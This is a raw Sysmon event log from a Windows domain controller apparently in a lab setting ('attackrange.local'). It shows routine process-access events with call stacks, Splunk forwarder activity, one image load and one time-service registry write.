C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463B-6000-7703-000000009A01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-463B-6000-7703-000000009A01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.211{08A6967A-463B-6000-7703-000000009A01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.976{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.976{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.976{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.976{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 11241100x80000000000000007678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:16.945{08A6967A-463C-6000-7A03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bdc-0\Microsoft.GroupPolicy.Targeting.dll2021-01-14 13:25:16.945 10341000x80000000000000007677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:25:16.773{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea78-0xb29ed52a) 10341000x80000000000000007661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-463C-6000-7B03-000000009A01}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 